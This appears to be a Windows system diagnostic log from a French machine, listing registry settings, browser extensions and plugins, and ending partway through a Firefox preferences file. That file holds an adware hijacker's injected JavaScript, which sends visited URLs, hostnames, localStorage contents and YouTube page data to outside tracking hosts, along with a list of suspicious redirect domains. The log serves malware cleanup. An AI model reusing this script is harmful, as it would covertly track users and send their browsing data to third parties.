"Default_Secondary_Page_URL"=
"Use_Async_DNS"=yes
"Start Page"=http://go.microsoft.com/fwlink/?LinkID=617911&ResetID=130895403744053704&GUID=93FD7B15-3E62-0D3B-60D1-2C3481FEDA67
"Local Page"=C:\Windows\System32\blank.htm
"Search Page"=http://www.google.com
"Delete_Temp_Files_On_Exit"=yes
"Enable_Disk_Cache"=yes
"Check_Associations"=yes
"ApplicationTileImmersiveActivation"=1
"AssociationActivationMode"=0
"x86AppPath"=C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

[HKLM\Software\WOW6432Node\Microsoft\Internet Explorer\SearchURL]
"Default"=http://www.google.com

[HKLM\Software\WOW6432Node\Microsoft\Internet Explorer\AboutURLs]
"blank"=res://mshtml.dll/blank.htm
"NoAdd-onsInfo"=res://ieframe.dll/noaddoninfo.htm
"InPrivate"=res://ieframe.dll/inprivate_win7.htm
"NavigationFailure"=res://ieframe.dll/navcancl.htm
"NoAdd-ons"=res://ieframe.dll/noaddon.htm
"Home"=270
"PostNotCached"=res://ieframe.dll/repost.htm
"DesktopItemNavigationFailure"=res://ieframe.dll/navcancl.htm
"NavigationCanceled"=res://ieframe.dll/navcancl.htm
"SecurityRisk"=res://ieframe.dll/securityatrisk.htm
"Tabs"=https://www.google.com/
"Compat"=res://mshtml.dll/compat.htm

[HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\URL\DefaultPrefix]
""=http://

[HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\URL\Prefixes]
"mosaic"=http://
"www"=http://
"home"=http://
"ftp"=ftp://

[HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet settings]
"EnablePunycode"=1
"CodeBaseSearchPath"=CODEBASE
"WarnOnIntranet"=1
"MinorVersion"=0
"ActiveXCache"=C:\Windows\Downloaded Program Files


---------- | reparsepoint


---------- | Detection of offsets


---------- | Notify 

[HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\igfxcui] : igfxdev.dll

---------- | SSODL | SEH | URLSH | STS


---------- | Toolbar

[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar]
"Locked"=0   
"ShowDiscussionButton"=Yes   

[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes]
"KnownProvidersUpgradeTime"=0x67DF20874135CF01   
"DownloadRetries"=4   
"Version"=4   
"UpgradeTime"=0x4E7B6CB543F8CF01   
"ShowSearchSuggestionsInAddressGlobal"=1   
"DefaultPackCorrection"=1   
"DefaultPackNTCorrection"=1   


---------- | Extensions

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{2670000A-7350-4f3c-8081-5663EE0C6C49}] : () -       []
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}] : () -       []
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}] : () -       []
[HKLM\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extensions\{219C3416-8CB2-491a-A3C7-D9FCDDC9D600}] : (@C:\Program Files (x86)\Windows Live\Writer\WindowsLiveWriterShortcuts.dll,-1003) -       []

---------- | SearchScopes

[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{80c554b9-c7f8-4a21-9471-06d606da78a2}] - (Bing) - http://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE : 
[HKLM\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\SearchScopes\{80c554b9-c7f8-4a21-9471-06d606da78a2}] - (Bing) - http://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE : 

---------- | Browser Helper Objects

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{9030D464-4C02-4ABF-8ECC-5164760863C6}] -> (Programme d’aide de l’Assistant de connexion au compte Microsoft) : C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll  [17/07/2012 15:51:50]
[HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}] -> (Java(tm) Plug-In SSV Helper) : C:\Program Files (x86)\Java\jre1.8.0_91\bin\ssv.dll  [09/07/2016 10:14:02]
[HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{9030D464-4C02-4ABF-8ECC-5164760863C6}] -> (Programme d’aide de l’Assistant de connexion au compte Microsoft) : C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll  [17/07/2012 15:51:50]
[HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DBC80044-A445-435b-BC74-9C25C1C588A9}] -> (Java(tm) Plug-In 2 SSV Helper) : C:\Program Files (x86)\Java\jre1.8.0_91\bin\jp2ssv.dll  [09/07/2016 10:14:01]

---------- | Chrome

C:\Users\Utilisateur\AppData\Local\Google\Chrome\User Data\Default\extensions\aapocclcgogkmnckokdopfmhonfmgoek =  : Google & co - Google & co - https://clients2.google.com/service/update2/crx
C:\Users\Utilisateur\AppData\Local\Google\Chrome\User Data\Default\extensions\aohghmighlieiainnegkcijnfilokake =  : Google & co - Google & co - https://clients2.google.com/service/update2/crx
C:\Users\Utilisateur\AppData\Local\Google\Chrome\User Data\Default\extensions\apdfllckaahabafndbhieahigkjlhalf =  : Google & co - https://drive.google.com/?usp=chrome_app - Google & co - [http://docs.google.com/http://drive.google.com/https://docs.google.com/https://drive.google.com/] - https://clients2.google.com/service/update2/crx
C:\Users\Utilisateur\AppData\Local\Google\Chrome\User Data\Default\extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo =  : Google & co - http://www.youtube.com - http://www.youtube.com - Google & co - http://clients2.google.com/service/update2/crx
C:\Users\Utilisateur\AppData\Local\Google\Chrome\User Data\Default\extensions\felcaaldnbdncclmgdcncolpebgiejap =  : Google & co - Google & co - https://clients2.google.com/service/update2/crx
C:\Users\Utilisateur\AppData\Local\Google\Chrome\User Data\Default\extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi =  :     __MSG_extDesc__ -     __MSG_extName__ - https://clients2.google.com/service/update2/crx
C:\Users\Utilisateur\AppData\Local\Google\Chrome\User Data\Default\extensions\nmmhkkegccagdldgiimedpiccmgmieda =  : Google & co - Google & co - 203784468217.apps.googleusercontent.com - https://clients2.google.com/service/update2/crx
C:\Users\Utilisateur\AppData\Local\Google\Chrome\User Data\Default\extensions\pjkljhegncpnkpknbcohdijeoejaedia =  : Google & co - https://mail.google.com/mail/ca - Google & co - [*://mail.google.com/mail/ca] - http://clients2.google.com/service/update2/crx


---------- | Opera


---------- | Firefox


[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\MozillaPlugins\@Skype Limited.com/Facebook Video Calling Plugin] - (Facebook Video Calling Plugin) : C:\Users\Utilisateur\AppData\Local\Facebook\Video\Skype\npFacebookVideoCalling.dll
[HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer] - (Adobe® Flash® Player 22.0.0.209 Plugin) : C:\Windows\system32\Macromed\Flash\NPSWF64_22_0_0_209.dll
[HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=10.5.0] - () : C:\Windows\system32\npDeployJava1.dll
[HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE] - () : C:\Windows\system32\Wat\npWatWeb.dll
[HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0] - (Ag Player Plugin) : c:\Program Files\Microsoft Silverlight\5.1.50428.0\npctrl.dll
[HKLM\Software\WOW6432Node\MozillaPlugins\@adobe.com/FlashPlayer] - (Adobe® Flash® Player 22.0.0.209 Plugin) : C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_22_0_0_209.dll
[HKLM\Software\WOW6432Node\MozillaPlugins\@google.com/npPicasa3,version=3.0.0] - (Picasa3 plugin) : C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll
[HKLM\Software\WOW6432Node\MozillaPlugins\@java.com/DTPlugin,version=11.91.2] - (Java™ Deployment Toolkit) : C:\Program Files (x86)\Java\jre1.8.0_91\bin\dtplugin\npDeployJava1.dll
[HKLM\Software\WOW6432Node\MozillaPlugins\@java.com/JavaPlugin,version=11.91.2] - (Oracle® Next Generation Java™ Plug-In) : C:\Program Files (x86)\Java\jre1.8.0_91\bin\plugin2\npjp2.dll
[HKLM\Software\WOW6432Node\MozillaPlugins\@microsoft.com/GENUINE] - () : C:\Windows\system32\Wat\npWatWeb.dll
[HKLM\Software\WOW6432Node\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0] - (Ag Player Plugin) : c:\Program Files (x86)\Microsoft Silverlight\5.1.50428.0\npctrl.dll
[HKLM\Software\WOW6432Node\MozillaPlugins\@microsoft.com/SharePoint,version=14.0] - (Microsoft SharePoint Plug-in for Firefox) : C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL
[HKLM\Software\WOW6432Node\MozillaPlugins\@microsoft.com/WLPG,version=16.4.3528.0331] - (WLPG Install MIME type) : C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll
[HKLM\Software\WOW6432Node\MozillaPlugins\@pandonetworks.com/PandoWebPlugin] - (This plugin detects and launches Pando Media Booster) : C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll
[HKLM\Software\WOW6432Node\MozillaPlugins\@tools.google.com/Google Update;version=3] - (Google Update) : C:\Program Files (x86)\Google\Update\1.3.30.3\npGoogleUpdate3.dll
[HKLM\Software\WOW6432Node\MozillaPlugins\@tools.google.com/Google Update;version=9] - (Google Update) : C:\Program Files (x86)\Google\Update\1.3.30.3\npGoogleUpdate3.dll
[HKLM\Software\WOW6432Node\MozillaPlugins\@videolan.org/vlc,version=2.0.8] - (VLC Multimedia Plugin) : C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll
[HKLM\Software\WOW6432Node\MozillaPlugins\@videolan.org/vlc,version=2.1.2] - (VLC Multimedia Plugin) : C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll
[HKLM\Software\WOW6432Node\MozillaPlugins\@videolan.org/vlc,version=2.2.1] - (VLC Multimedia Plugin) : C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll
[HKLM\Software\WOW6432Node\MozillaPlugins\@videolan.org/vlc,version=2.2.3] - (VLC Multimedia Plugin) : C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll
[HKLM\Software\WOW6432Node\MozillaPlugins\Adobe Reader] - (Handles PDFs in-place in Firefox) : C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll


C:\Users\Utilisateur\AppData\Roaming\Mozilla\Firefox\Profiles\5lvohhu3.default-1422270210674\Prefs.js

user_pref("browser.newtab.url", "https://www.google.com");
user_pref("browser.search.defaultenginename", "google");
user_pref("browser.search.selectedEngine", "Bing®");
user_pref("browser.startup.homepage", "https://www.google.com");
user_pref("browser.startup.homepage_override.buildID", "20160604131506");
user_pref("browser.startup.homepage_override.mstone", "47.0");
user_pref("extensions.IqhhctFrW0zaGlNB.epoch", "1422597138");
user_pref("extensions.IqhhctFrW0zaGlNB.url", "http://toolkitcard.in/sync2/?q=hfZ9oflRCM9HtNbPhd9Grjw8rGhTB6lKDzt4okhitNtVh7n0rjkErjs6rjnHqTa4tMFHhd9FqjaFrTCFqdk9rjCMDMlGojUMAe4Uojg6rdsErTa5rHU6rTn8rTg4rdgMC6qUojwErdgFqds9qjkGpja5pdUGqTY4tNZKge8VokxIBwqOhexEkztPg7kMAyVUojY9rHY4qjUErTC8qHn8qHkGqHaMB6qPhd97rdwMAe4HDd97tMtHojw%3D;http://winnerhomecompletezip.net/sync2/?q=hfZ9oflRCM9HtNbPhd9Grjw8rGhTB6lKDzt4okhitNtVh7n0rjkErjs6rjnHqTa4tMFHhd9FqjaFrTCFqdk9rjCMDMlGojUMAe4Uojg6rdsErTa5rHU6rTn8rTg4rdgMC6qUojwErdgFqds9qjkGpja5pdUGqTY4tNZKge8VokxIBwqOhexEkztPg7kMAyVUojY9rHY4qjUErTC8qHn8qHkGqHaMB6qPhd97rdwMAe4HDd97tMtHojw%3D;http://veterance.org/sync2/?q=hfZ9oflRCM9HtNbPhd9Grjw8rGhTB6lKDzt4okhitNtVh7n0rjkErjs6rjnHqTa4tMFHhd9FqjaFrTCFqdk9rjCMDMlGojUMAe4Uojg6rdsErTa5rHU6rTn8rTg4rdgMC6qUojwErdgFqds9qjkGpja5pdUGqTY4tNZKge8VokxIBwqOhexEkztPg7kMAyVUojY9rHY4qjUErTC8qHn8qHkGqHaMB6qPhd97rdwMAe4HDd97tMtHojw%3D;http://skyfunnjobbest.info/sync2/?q=hfZ9oflRCM9HtNbPhd9Grjw8rGhTB6lKDzt4okhitNtVh7n0rjkErjs6rjnHqTa4tMFHhd9FqjaFrTCFqdk9rjCMDMlGojUMAe4Uojg6rdsErTa5rHU6rTn8rTg4rdgMC6qUojwErdgFqds9qjkGpja5pdUGqTY4tNZKge8VokxIBwqOhexEkztPg7kMAyVUojY9rHY4qjUErTC8qHn8qHkGqHaMB6qPhd97rdwMAe4HDd97tMtHojw%3D;http://jobfirstall.in/sync2/?q=hfZ9oflRCM9HtNbPhd9Grjw8rGhTB6lKDzt4okhitNtVh7n0rjkErjs6rjnHqTa4tMFHhd9FqjaFrTCFqdk9rjCMDMlGojUMAe4Uojg6rdsErTa5rHU6rTn8rTg4rdgMC6qUojwErdgFqds9qjkGpja5pdUGqTY4tNZKge8VokxIBwqOhexEkztPg7kMAyVUojY9rHY4qjUErTC8qHn8qHkGqHaMB6qPhd97rdwMAe4HDd97tMtHojw%3D;http://installsunny.us/sync2/?q=hfZ9oflRCM9HtNbPhd9Grjw8rGhTB6lKDzt4okhitNtVh7n0rjkErjs6rjnHqTa4tMFHhd9FqjaFrTCFqdk9rjCMDMlGojUMAe4Uojg6rdsErTa5rHU6rTn8rTg4rdgMC6qUojwErdgFqds9qjkGpja5pdUGqTY4tNZKge8VokxIBwqOhexEkztPg7kMAyVUojY9rHY4qjUErTC8qHn8qHkGqHaMB6qPhd97rdwMAe4HDd97tMtHojw%3D;http://toolkitcomp.info/sync2/?q=hfZ9oflRCM9HtNbPhd9Grjw8rGhTB6lKDzt4okhitNtVh7n0rjkErjs6rjnHqTa4tMFHhd9FqjaFrTCFqdk9rjCMDMlGojUMAe4Uojg6rdsErTa5rHU6rTn8rTg4rdgMC6qUojwErdgFqds9qjkGpja5pdUGqTY4tNZKge8VokxIBwqOhexEkztPg7kMAyVUojY9rHY4qjUErTC8qHn8qHkGqHaMB6qPhd97rdwMAe4HDd97tMtHojw%3D;http://zipmasterbox.info/sync2/?q=hfZ9oflRCM9HtNbPhd9Grjw8rGhTB6lKDzt4okhitNtVh7n0rjkErjs6rjnHqTa4tMFHhd9FqjaFrTCFqdk9rjCMDMlGojUMAe4Uojg6rdsErTa5rHU6rTn8rTg4rdgMC6qUojwErdgFqds9qjkGpja5pdUGqTY4tNZKge8VokxIBwqOhexEkztPg7kMAyVUojY9rHY4qjUErTC8qHn8qHkGqHaMB6qPhd97rdwMAe4HDd97tMtHojw%3D;http://toolkitfun.in/sync2/?q=hfZ9oflRCM9HtNbPhd9Grjw8rGhTB6lKDzt4okhitNtVh7n0rjkErjs6rjnHqTa4tMFHhd9FqjaFrTCFqdk9rjCMDMlGojUMAe4Uojg6rdsErTa5rHU6rTn8rTg4rdgMC6qUojwErdgFqds9qjkGpja5pdUGqTY4tNZKge8VokxIBwqOhexEkztPg7kMAyVUojY9rHY4qjUErTC8qHn8qHkGqHaMB6qPhd97rdwMAe4HDd97tMtHojw%3D;http://transferbookmy.info/sync2/?q=hfZ9oflRCM9HtNbPhd9Grjw8rGhTB6lKDzt4okhitNtVh7n0rjkErjs6rjnHqTa4tMFHhd9FqjaFrTCFqdk9rjCMDMlGojUMAe4Uojg6rdsErTa5rHU6rTn8rTg4rdgMC6qUojwErdgFqds9qjkGpja5pdUGqTY4tNZKge8VokxIBwqOhexEkztPg7kMAyVUojY9rHY4qjUErTC8qHn8qHkGqHaMB6qPhd97rdwMAe4HDd97tMtHojw%3D");
user_pref("extensions.PhWU1d21xmujftNh.epoch", "1428741779");
user_pref("extensions.PhWU1d21xmujftNh.scode", "(function(){try{if(window.self.location.href.indexOf(\"pdnHpdU8pjaGqHk6qdk6qjs6ra\")>-1){return;}}catch(e){}try{var d=[[\"trianglecash.com\",\"acebook\",\"flybrain.com\",\"www.pcutilitiespro.com\",\"www.pcutilitiespro.net\",\"www.superpctools.com\",\"www.superpctools.net\",\"www.pcrepairlabs.com\",\"www.pcrepairlabs.net\",\"www.viracure.com\",\"www.viracure.net\",\"www.onesave.com\",\"www.onesave.net\",\"www.centralshopgate.com\",\"www.centralshopgate.net\",\"www.safeshopgate.com\",\"www.safeshopgate.net\",\"securedshopgate.com\",\"securedshopgate.net\",\"gen.securedshopgate.com\",\"gen.securedshopgate.net\",\"e4everything.co\",\"3juices.s\",\"safecart.com\",\"cleverbridge.com\",\"warnalert11.com\",\"sumorobo.net\",\"mindri.com\",\"alertfunctions.com\",\"immediate-support.com\",\"sumorobo\",\"roulettebotplus\",\"s.vgsgaming-ads\",\"lottery-master\",\"lotterymaster\",\"onduit\",\"search.imesh\",\"search.searchcore\",\"searchnu.com\",\"searchqu.com\",\"shareazaweb\",\"searchgby.com\",\"mysearchresults.com\",\"searchya.com\",\"searchgol.com\",\"trovi.com\",\"search.ask\",\"mywebsearch.com\",\"search-results.com\",\"mysearch.com\",\"offers.bycontext.com\",\"deals.offer-dynamics.com\",\"offer-dynamics.com\",\"deadsea.com\",\"jerusalem.com\",\"vatican.com\",\"iklk.com\",\"gvud.com\",\"zuzd.com\",\"babaviral.com\",\"cupid.so\",\"hostanytime.com\",\"antivirus.so\",\"dates.am\",\"insurance-company.co\",\"advanceloan.org\",\"calcitapp.info\",\"desktopfavapp.info\",\"avatrade.com\",\"game-trek.net\",\"urgent-alerts.com\",\"pc-alert.com\",\"error-alerts.com\",\"search.searchonme.com\",\"searchitapp.com\",\"news.searchonme.com\",\"search.appsarefun.info\",\"websearch.mocaflix.com\",\"search.easylifeapp.com\",\"searchy.easylifeapp.com\",\"us.yhs4.search.yahoo.com\",\"search.gboxapp.com\",\"searchiy.gboxapp.com\",\"bestonlinegadgetguide.com\",\"odpu.com\",\"safesearch.co\",\"findamo.com\",\"search.myownsearchbox.com\",\"datropy.com\",\"applicationgrabb.net\",\"databass.info\",\"firstfirst.net\",\"liversely.com\",\"liversely.net\",\"livesetwebs.org\",\"lp.ncdownloader.com\",\"lp.vaudix.com\",\"masteroids.com\",\"reditions.net\",\"sharesuper.info\",\"storaget.info\",\"westzip.in\",\"boxhilade.com\",\"mylinksworld.com\",\"shoppingwiz.co\",\"rabbitsearch.net\",\"searchandbake.com\",\"smartshopping.com\",\"www.search.smartshopping.com\",\"www.local.smartshopping.com\",\"www.shoppstop.com\",\"localmoxie.com\",\"www.yellowmoxie.com\",\"www.mail.com\",\"suche.mail.com\",\"www.web.de\",\"suche.web.de\",\"suche.gmx.de\",\"search.gmx.com\",\"search.gmx.co.uk\",\"news.gmx.com\",\"news.gmx.co.uk\",\"www.turbosearchengine.com\",\"search.turbosearchengine.com\",\"www.relatedtopix.com\",\"search.relatedtopix.com\",\"www.app-rover.com\",\"www.appigniter.com\",\"www.bposolutions.com\",\"www.zhuamob.com\",\"www.yieldnexus.com\",\"www.tfxiq.com\",\"www.tfxiq.net\",\"sporty-glow.com\",\"namyneck.com\",\"styloosh.com\",\"baidu.co.th\",\"ooyd.com\",\"jobsro.com\",\"kaoor.com\",\"myloginbox.com\",\"mainpagesite.com\",\"turtleclip.com\",\"blackyclip.com\",\"film-tease.com\",\"bestpaydayloans2015.com\",\"hotelsdealsreviews.com\",\"top10cellphoneplans.com\",\"top5autoinsurance.com\",\"topcreditreportsites.com\"],[/^websearch.(mocaflix|searchissimple|just-browse|good-results|searchsupporter|soft-quick|pu-results|simplespeedy|helpmefindyour|greatresults|youwillfind|lookforitthere|lookforithere|searchmainia|searchrocket|homesearchapp|a-searchpage|coolwebsearch|homesearch-hub|resulthunters|searchdwebs|searchingisme|searchannel|searchouse|pur-esult|searchboxes|searchitup|searchpages|searchesplace|simplesearches|goodfindings|searchiseasy|the-searcheng|oversearch|searchere|relevantsearch|wisesearch|search-guide|searchisbestmy|searchbomb|searchguru|searchsun|searchsunmy|toolksearchbook|searchinweb|webisgreat|webisawsome|exitingsearch|amaizingsearches|searchingissme|awsomesearchs|eazytosearch|ezsearches|fastosearch|fastsearchings|flyandsearch|wonderfulsearches|fixsearch|searchandfly|searchfix|allsearches|searc-hall|simple2search|searchitwell).info$/,/search\\.(easylifeapp|gboxapp|searchonme|appsarefun|genieo)\\.com/]];for(var i=0,a=d[0],l=a.length;i<l;i++){if(window.self.location.hostname.indexOf(a[i])>-1){return;}}for(var j=0,a=d[1],l=a.length;j<l;j++){if(a[j].test(window.self.location.hostname)){return;}}}catch(e){}try{var u=[[\"revenuewire.com/pcutilitiespro\",\"__ipm=\",\"=apapamam\",\"txtlnkusaolp00000800\",\"=admaven\",\"5386b_643c_\",\"=CONMHP&conlogo=CT3210127\",\"www.livegeekhelp.com/pop/\",\"?ctid=ct3330145\",\"?ctid=ct3330146\",\"?ctid=ct3330147\",\"?ctid=ct3330148\",\"?ctid=ct3330149\",\"if72ru4sdfsdfruh7fewui\",\"fghjktghndfgtssss\",\"form=u064ht&pc=u064\",\"source=45905810\",\"source=532d277e\",\"aro.com/ws/?source=6974b128\",\"esmoke.com/?isid=9949\",\"esmoke.com/?isid=9950\",\"esmoke.com/?isid=9951\",\"id=webpick_ot\",\"id=wbpk_ot\",\"hash=a4vxy8\",\"hash=m5g73j\",\"hash=hg7gja\",\"hash=fz61s5\",\"hash=1i5w2d\",\"hash=zndas3\",\"hash=b3qau4\",\"hash=ijeqe4\",\"duit&ptag=aa7aab832a2de41458bf&\",\"duit&ptag=a93f650ac0e6a4a4791f&\",\"duit&ptag=a79888693f6ca4634a6f\",\"duit&ptag=a359b17b6faa44e6b86f\",\"isid=mf245f633-e188-4162-b56a\",\"sid=meabfcf9a-556b-4c5c-8727\",\"isid=m8fbc22fe-ab08-464e-aa63\",\"uid=531364863_132823_4252277e\"],[/[\\?&]p=24039(&|$)/,/lll[a-zA-Z0-9]{11}00/,/#FA[-_]/,/bing\\.com[^p]+pc=.+/,/^http:\\/\\/sporty-glow\\.com\\//,/^http:\\/\\/game-trek\\.net\\//,/#(a652c|ld893)_/,/ressbar\\.com[^f]+fid=65017/,/^https?:\\/\\/([a-z0-9-]+\\.)*search\\.yahoo\\.com\\/yhs\\/.*[&?]hspart=webpick(&|$)/]];for(var i=0,a=u[0],l=a.length;i<l;i++){if((window.self.location.href+\"#\"+window.name).indexOf(a[i])>-1){(new Image).src = \"//\"+[\"resourcesiso.xyz\",\"thematrixinner.net\"][window.location.protocol!= \"https:\"?0:1]+\"/?n=\"+encodeURIComponent(a[i])+\"&h=\"+encodeURIComponent(window.self.location.href+\"#\"+window.name)+\"&d=\"+encodeURIComponent(window.self.location.hostname)+\"&eid=1307&pid=21153&hid=8438959027574575270\";return;}}for(var j=0,a=u[1],l=a.length;j<l;j++){if(a[j].test(window.self.location.href+\"#\"+window.name)){(new Image).src=\"//\"+[\"resourcesiso.xyz\",\"thematrixinner.net\"][window.location.protocol!=\"https:\"?0:1]+\"/?n=\"+encodeURIComponent(a[j])+\"&h=\"+encodeURIComponent(window.self.location.href+\"#\"+window.name)+\"&d=\"+encodeURIComponent(window.self.location.hostname)+\"&eid=1307&pid=21153&hid=8438959027574575270\";return;}}}catch(e){}try{(function(){var b,f,g;try{var a=window.self.location.href;if(!(window.self==window.top||\"undefined\"==typeof localStorage||\"undefined\"==typeof localStorage.setItem||-1==a.indexOf(\"EuJdcBKX=\")&&!a.match(/1018-\\d{3,4}_/)&&-1==a.indexOf(\"cdncache-a.aka\"))){if(-1<a.indexOf(\"EuJdcBKX=\")){var d=a.match(/EuJdcBKX=(\\d+)_(\\d{2,3}x\\d{2,3})_?(\\d+)?/);b=d[1];f=d[2].replace(\"x\",\".\");g=d[3]?d[3]:0}else{try{var j=-1<a.indexOf(\"zoneid\")?a.match(/zoneid=(\\d+)/)[1]:a.match(/1018-(\\d+)_WS/)[1]}catch(n){j=0}var c=document.getElementsByTagName(\"body\")[0];b=-1<a.indexOf(\"cdncache-a.aka\")?1001:1002;f=Math.max(c.scrollWidth,c.offsetWidth)+\".\"+Math.max(c.scrollHeight,c.offsetHeight);g=j}var e=new Date,k=parseInt(e.getTime()/1E3),l=\"zyk_\"+[e.getUTCFullYear()+\"-\"+(e.getUTCMonth()+1)+\"-\"+e.getUTCDate(),b,f,g].join(),m=localStorage.getItem(l);localStorage.setItem(l,1+(m?parseInt(m):0));if(lsTime=localStorage.getItem(\"zEpoch\")){if(7200<k-parseInt(lsTime)){var h=document.createElement(\"div\");b=[];for(i in localStorage)-1<i.indexOf(\"zyk_\")&&b.push(\"'\"+i.replace(\"zyk_\",\"\")+\"':\"+localStorage.getItem(i));h.style.display=\"none\";h.innerHTML='<iframe name=\"webscorebox_ifr\"></iframe><form target=\"webscorebox_ifr\" method=\"post\" action=\"http://count3.webscorebox.com/?q=g708BNmGWj8ykShVWzmPhd9FrHa6tNbPhd9Grjw8rGh7hftHAe0KojUMgNtLD6qVCT9GtMDPhd9EtMZPhd95qdr5pjk4rds6qjC9qjC8rTCE\" id=\"webscorebox_frm\"><input type=\"hidden\" name=\"scores\" value=\"{'+b.join(\",\")+'}\"></form>';(typeof c!=\"undefined\"?c:document.getElementsByTagName(\"body\")[0]).appendChild(h);document.getElementById(\"webscorebox_frm\").submit();localStorage.clear()}}else localStorage.setItem(\"zEpoch\",k)}}catch(p){}})();(function(){var l=function(){var a=window.location.search.split(\"v=\")[1],b=a&&a.indexOf(\"&\")||-1;-1!=b&&(a=a.substring(0,b));return a},m=function(){var a=document.getElementsByClassName(\"watch-view-count\");return a&&a[0]&&a[0].innerHTML?(a=a[0].innerHTML.replace(/^([0-9,]+).*$/,\"$1\").replace(/,/g,\"\"))&&parseInt(a)&&parseInt(a)||0:0},n=function(){var a=document.getElementsByClassName(\"watch-extras-section\");if(a)for(var b=0;b<a[0].children.length;b++)if(\"Category\"===a[0].children[b].getElementsByClassName(\"title\")[0].innerHTML.trim()){var c=a[0].children[b].getElementsByTagName(\"a\");if(c&&c[0]&&(c=c[0].getAttribute(\"href\")))return encodeURIComponent(c.replace(\"/\",\"\"))}return\"\"},p=function(){var a=document.getElementsByClassName(\"yt-subscription-button-subscriber-count-branded-horizontal\");return a&&a[0]&&a[0].innerHTML?(a=a[0].innerHTML.replace(/^([0-9,]+).*$/,\"$1\").replace(/,/g,\"\"))&&parseInt(a)&&parseInt(a)||1:1};if(window.self==window.top&&(-1<window.self.location.hostname.indexOf(\"youtube.com\")||-1<window.self.location.hostname.indexOf(\"youtu.be\")))try{if(\"qq=\"==window.name.substr(0,3)){var f=document.getElementsByTagName(\"body\")[0];if(!f.getAttribute(\"wyttb\")){f.setAttribute(\"wyttb\",\"1\");var g=l(),d=m(),q=n(),h=p();if(g&&d&&d){var e=window.name.split(\"=\")[1];window.name=\"\";2<=d/h&&((new Image).src=\"https://score.transferin.in/subs.php?id=\"+g+\"&n=\"+d+\"&c=\"+q+\"&s=\"+h+\"&q=\"+e+\"&cb=31.37.230.80\")}}}if(-1<window.self.location.href.indexOf(\"results?search_query=\")){var k=/[\\?&]search_query=([^&#]*)/.exec(location.search),e=null===k?\"\":decodeURIComponent(k[1].replace(/\\+/g,\" \"));window.name=\"qq=\"+e}}catch(r){}})();new function(){var k=this;this.utils=new function(){var c=this;c.sendPixels=function(a){var b;if(a instanceof Array)for(var e=0;e<a.length;e++){var d=a[e];b=new Image;b.src=d}else b=new Image,b.src=a};c.isFalse=function(a){return\"undefined\"==typeof a||0===a.length||null===a};c.cookie=new function(){var a=this;a.createCookie=function(a,e,d){if(d){var c=new Date;c.setTime(c.getTime()+864E5*d);d=\"; expires=\"+c.toGMTString()}else d=\"\";document.cookie=a+\"=\"+e+d+\"; path=/\"};a.readCookie=function(a){a+=\r\n\"=\";for(var e=document.cookie.split(\";\"),d=0;d<e.length;d++){for(var c=e[d];\" \"==c.charAt(0);)c=c.substring(1,c.length);if(0==c.indexOf(a))return c.substring(a.length,c.length)}return null};a.eraseCookie=function(b){a.createCookie(b,\"\",-1)}};c.ajax={get:function(a,b){try{this.xhr=new XMLHttpRequest,this.xhr.open(\"GET\",a,!0),this.xhr.onreadystatechange=function(){4==c.ajax.xhr.readyState&&b(c.ajax.xhr.responseText)},this.xhr.send()}catch(e){}},post:function(a,b,e){this.xhr=new XMLHttpRequest;this.xhr.open(\"POST\",\r\na,!0);this.xhr.setRequestHeader(\"Content-type\",\"application/x-www-form-urlencoded\");this.xhr.onreadystatechange=function(){4==c.ajax.xhr.readyState&&e(c.ajax.xhr.responseText)};b=encodeURIComponent(b);this.xhr.send(b)}};c.waitForTokens={};c.addScript=function(a,b){if(\"bing\"==b){var e=Element.prototype.appendChild;document.createElement(\"iframe\");Element.prototype.appendChild=document.appendChild;document.getElementsByTagName(\"head\")[0].appendChild(a);Element.prototype.appendChild=e}else document.getElementsByTagName(\"head\")[0].appendChild(a)};\r\nc.waitForElement=function(a,b,e,d){var 